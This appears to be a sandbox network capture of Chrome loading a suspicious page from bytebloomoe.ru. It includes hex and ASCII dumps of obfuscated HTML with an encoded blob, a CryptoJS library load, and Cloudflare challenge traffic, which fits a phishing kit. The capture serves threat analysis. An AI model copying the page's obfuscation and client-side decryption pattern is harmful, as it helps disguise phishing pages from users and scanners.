                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tkNpABmgVJf%2Fjw8GOTUX4tOfP%2BytBiZKNNPhbIIxTl0Dv%2FJyXPzDJmnWdR69i5c%2Fz2NidvOewA8Fan9dU%2FJgAZolgC3wkmgXHPXQF85IyA6rtvx07ZRAzeqiiDwLPbOdyQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8b2b46feb87a42ec-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-08-13 19:58:01 UTC598INData Raw: 31 36 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 73 74 79 6c
                            Data Ascii: 1692<html> <head> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script> <styl
                            2024-08-13 19:58:01 UTC1369INData Raw: 20 38 30 25 20 7b 6f 70 61 63 69 74 79 3a 20 30 3b 7d 34 37 25 2c 20 37 30 25 20 7b 6f 70 61 63 69 74 79 3a 20 31 3b 7d 7d 23 61 62 61 74 65 20 7b 77 69 64 74 68 3a 20 31 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 39 70 78 3b 7d 23 74 61 63 69 74 6c 79 20 7b 77 69 64 74 68 3a 20 31 33 30 70 78 3b 68 65 69 67 68 74 3a 20 37 31 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 20 30 20 37 70 78 20 37 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 34 31 70 78 3b 7d 23 74 61 63 69 74 6c 79 3e 2e 7a 69 6e 6e 69 61 20 7b 77 69 64 74 68 3a 20 32 38 37 70 78 3b 68 65 69 67 68 74 3a 20 37 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 37 61 30 65 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 20
                            Data Ascii: 80% {opacity: 0;}47%, 70% {opacity: 1;}}#abate {width: 130px;margin-top: 179px;}#tacitly {width: 130px;height: 71px;border-radius: 0 0 7px 7px;overflow: hidden;margin-top: -41px;}#tacitly>.zinnia {width: 287px;height: 71px;background: #27a0e0;transform:
                            2024-08-13 19:58:01 UTC1369INData Raw: 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 34 66 63 66 66 66 3b 7d 2e 6c 61 63 74 65 61 6c 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 33 35 66 62 33 3b 7d 2e 61 62 64 75 63 74 69 6f 6e 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 31 33 34 32 37 36 3b 7d 23 67 61 6c 6c 61 6e 74 6c 79 20 7b 77 69 64 74 68 3a 20 31 33 30 70 78 3b 68 65 69 67 68 74 3a 20 31 30 37 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 70 65 6e 65 64 2d 66 6c 61 70 2d 73 77 69 6e 67 20 35 73 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 33 32 2c 20 30 2c 20 30 2e 36 37 2c 20 30 29 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 74 6f 70 3b 74 72 61 6e 73 66 6f 72
                            Data Ascii: {background: #4fcfff;}.lacteal {background: #035fb3;}.abduction {background: #134276;}#gallantly {width: 130px;height: 107px;animation: opened-flap-swing 5s infinite;animation-timing-function: cubic-bezier(0.32, 0, 0.67, 0);transform-origin: top;transfor
                            2024-08-13 19:58:01 UTC1369INData Raw: 63 6c 61 73 73 3d 22 6a 61 63 6b 72 61 62 62 69 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 7a 69 6e 67 20 6b 65 6c 70 22 3e 3c 2f 64 69 76 3e 20 3c 21 2d 2d 20 3c 70 3e 41 20 63 61 72 e2 80 99 73 20 6c 65 67 61 63 79 20 6c 69 76 65 73 20 6f 6e 20 69 6e 20 74 68 65 20 6d 65 6d 6f 72 69 65 73 20 69 74 20 63 72 65 61 74 65 73 2e 3c 2f 70 3e 20 2d 2d 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 7a 69 6e 67 20 71 75 61 64 72 69 70 6c 65 67 69 63 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 7a 69 6e 67 20 73 61 64 64 6c 65 62 61 67 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 61 63 6b 72 61 62 62 69 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 7a 69 6e 67 20 6c 61 63 74 65 61 6c 22 3e 3c 2f 64 69 76 3e 3c
                            Data Ascii: class="jackrabbit"><div class="zing kelp"></div> ... <p>A cars legacy lives on in the memories it creates.</p> --><div class="zing quadriplegic"></div><div class="zing saddlebag"></div></div><div class="jackrabbit"><div class="zing lacteal"></div><
                            2024-08-13 19:58:01 UTC1081INData Raw: 6a 49 31 4e 7a 52 6c 4e 44 6b 7a 4d 7a 55 30 5a 6a 49 35 59 6a 56 69 5a 6d 55 77 4f 54 68 6b 59 7a 55 32 4e 44 45 33 59 6a 67 69 4c 43 4a 69 49 6a 6f 69 59 32 55 78 5a 44 4a 6d 5a 47 51 35 4e 44 51 32 4e 7a 42 6b 59 32 55 7a 4d 7a 41 30 4d 6a 56 68 5a 47 46 6d 4d 6d 49 7a 5a 6d 59 79 4e 57 59 35 5a 47 4e 6b 4f 54 59 31 4d 6a 59 77 4d 6d 52 6a 4e 44 4e 6c 4d 57 56 6a 4d 44 59 32 59 7a 45 31 4d 54 64 68 4e 44 68 6c 4e 6a 49 78 59 6d 46 68 5a 54 55 31 4e 54 6b 30 4f 44 46 68 4e 6a 63 31 4e 7a 67 35 5a 6a 49 31 4f 44 4e 6b 4f 54 6b 32 4e 6a 4d 34 4e 32 4e 6b 4e 54 67 32 4e 32 51 79 4d 32 4e 6a 5a 44 59 33 4e 7a 46 68 4d 32 59 30 4e 47 4a 69 4d 7a 55 31 59 6a 46 6c 4f 47 55 33 5a 57 49 35 59 6a 6b 33 4d 44 4d 31 4e 47 56 6d 4e 6d 4e 6c 59 6d 4a 6a 4e 54 46 6c
                            Data Ascii: jI1NzRlNDkzMzU0ZjI5YjViZmUwOThkYzU2NDE3YjgiLCJiIjoiY2UxZDJmZGQ5NDQ2NzBkY2UzMzA0MjVhZGFmMmIzZmYyNWY5ZGNkOTY1MjYwMmRjNDNlMWVjMDY2YzE1MTdhNDhlNjIxYmFhZTU1NTk0ODFhNjc1Nzg5ZjI1ODNkOTk2NjM4N2NkNTg2N2QyM2NjZDY3NzFhM2Y0NGJiMzU1YjFlOGU3ZWI5Yjk3MDM1NGVmNmNlYmJjNTFl
                            2024-08-13 19:58:01 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            28192.168.2.659188104.18.94.414432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:59 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1850929969:1723574616:8PT3AyiGmN4W4umEYHIb06JjWIFlP6lIjxkzNvrNFc0/8b2b466a48c34405/ca1f4aa5097dc0c HTTP/1.1
                            Host: challenges.cloudflare.com
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:57:59 UTC379INHTTP/1.1 404 Not Found
                            Date: Tue, 13 Aug 2024 19:57:59 GMT
                            Content-Type: application/json
                            Content-Length: 7
                            Connection: close
                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                            cf-chl-out: u2kld40FsZpxTLiTvu+i9hedgqEB0g7IXhc=$ETjpopFnnPkk+J/c
                            Server: cloudflare
                            CF-RAY: 8b2b46ff0c95c41b-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-08-13 19:57:59 UTC7INData Raw: 69 6e 76 61 6c 69 64
                            Data Ascii: invalid


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            29192.168.2.659189104.17.25.144432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:58:01 UTC560OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                            Host: cdnjs.cloudflare.com
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: script
                            Referer: https://bytebloomoe.ru/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:58:01 UTC956INHTTP/1.1 200 OK
                            Date: Tue, 13 Aug 2024 19:58:01 GMT
                            Content-Type: application/javascript; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Access-Control-Allow-Origin: *
                            Cache-Control: public, max-age=30672000
                            ETag: W/"5eb03e2d-bb78"
                            Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                            cf-cdnjs-via: cfworker/kv
                            Cross-Origin-Resource-Policy: cross-origin
                            Timing-Allow-Origin: *
                            X-Content-Type-Options: nosniff
                            CF-Cache-Status: HIT
                            Age: 438875
                            Expires: Sun, 03 Aug 2025 19:58:01 GMT
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=brp0d1LoTEmsRqba6fX7v9rweTDtCQgdY3syOvUGTbwPXE%2BLYpSypv7wvIi9d1vElyl5JcWxAE7Rxod8binIbdlDMUSFtoyncdqScVBmuut5gWe2g7qaNo%2FYqEPs7aLWisEQvI4A"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                            Strict-Transport-Security: max-age=15780000
                            Server: cloudflare
                            CF-RAY: 8b2b470c6ff21a44-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-08-13 19:58:01 UTC413INData Raw: 37 62 66 35 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                            Data Ascii: 7bf5!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                            2024-08-13 19:58:01 UTC1369INData Raw: 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e
                            Data Ascii: ndow.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.
                            2024-08-13 19:58:01 UTC1369INData Raw: 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e
                            Data Ascii: <n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:function
                            2024-08-13 19:58:01 UTC1369INData Raw: 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73 73 42
                            Data Ascii: ,this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProcessB
                            2024-08-13 19:58:01 UTC1369INData Raw: 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30 3f 31 3a 30
                            Data Ascii: ?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0?1:0
                            2024-08-13 19:58:01 UTC1369INData Raw: 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28
                            Data Ascii: ]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i|0)+((
                            2024-08-13 19:58:01 UTC1369INData Raw: 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36 37 32 39 36
                            Data Ascii: *2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=4294967296
                            2024-08-13 19:58:01 UTC1369INData Raw: 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29 2c 6d 3d 43
                            Data Ascii: m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38]),m=C
                            2024-08-13 19:58:01 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63
                            Data Ascii: call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<<o|c
                            2024-08-13 19:58:01 UTC1369INData Raw: 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29 29 29 2c 42
                            Data Ascii: tion(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5))),B


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            30192.168.2.659190104.17.24.144432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:58:02 UTC386OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                            Host: cdnjs.cloudflare.com
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:58:02 UTC958INHTTP/1.1 200 OK
                            Date: Tue, 13 Aug 2024 19:58:02 GMT
                            Content-Type: application/javascript; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Access-Control-Allow-Origin: *
                            Cache-Control: public, max-age=30672000
                            ETag: W/"5eb03e2d-bb78"
